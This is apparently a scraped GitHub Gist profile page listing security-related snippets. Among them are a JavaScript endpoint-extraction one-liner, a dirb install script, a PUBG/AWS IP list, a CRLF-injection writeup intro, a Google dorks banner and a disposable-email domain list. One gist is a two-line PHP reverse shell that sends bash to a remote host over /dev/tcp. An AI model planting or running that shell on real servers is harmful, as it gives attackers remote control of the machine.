Skip to content

Instantly share code, notes, and snippets.

Avatar
:shipit:
always depressed in 0.0.0.0

Alpha gitnepal

:shipit:
always depressed in 0.0.0.0
  • medium.com/@admin.
  • Paradox 0.0.0.0
  • Twitter @___0x00
View GitHub Profile
@gitnepal
gitnepal / tools
Created Jun 25, 2020
tools installed on linux
View tools
-> apktool disassembling , modifying the apk files
@gwen001
gwen001 / ejs.sh
Last active Aug 20, 2021
onliner to extract endpoints from JS files of a given host
View ejs.sh
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# using linkfinder
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}
# with file download (the new best one):
# but there is a bug if you don't provide a root url
@gmolveau
gmolveau / install_dirb.sh
Created Sep 2, 2019
mac osx dirb install
View install_dirb.sh
cd ~/Applications
wget https://downloads.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar -xvf dirb222.tar.gz
rm dirb222.tar.gz
brew install autoconf
chmod -R 755 dirb222
cd dirb222
./configure
make
make install
View PUBG SERVERS IP
List of all AWS servers
AWS (Amazon Web Services) - this company provides PUBG servers. Not all of them uses in a game, but there is full Server - IP list. Maybe this info can be useful for you:
US EAST - North Virginia
us-east-1 - 23.23.255.255
us-east-1 - 34.192.0.54
us-east-1 - 34.224.0.252
us-east-1 - 50.17.255.254
us-east-1 - 50.19.255.254
us-east-1 - 52.1.255.254
@tomnomnom
tomnomnom / php-curl-crlf-injection.mkd
Last active Mar 29, 2021
CRLF Injection Into PHP's cURL Options
View php-curl-crlf-injection.mkd

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

@cypris75
cypris75 / temporary-email-address-domains
Last active May 9, 2020 — forked from adamloving/temporary-email-address-domains
A list of domains for disposable and temporary email addresses. Useful for filtering your email list to increase open rates (sending email to these domains likely will not be opened).
View temporary-email-address-domains
007addict.com
012.net.il
0451.com
0815.ru
0815.su
0clickemail.com
0-mail.com
0wnd.net
0wnd.org
10mail.org
@stevenswafford
stevenswafford / google-dorks
Created Jun 6, 2015
Listing of a number of useful Google dorks.
View google-dorks
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@rshipp
rshipp / shell.php
Created Jul 17, 2014
A tiny PHP/bash reverse shell.
View shell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@cdown
cdown / gist:1163649
Last active Sep 21, 2021
Bash urlencode and urldecode
View gist:1163649
urlencode() {
# urlencode <string>
old_lc_collate=$LC_COLLATE
LC_COLLATE=C
local length="${#1}"
for (( i = 0; i < length; i++ )); do
local c="${1:$i:1}"
case $c in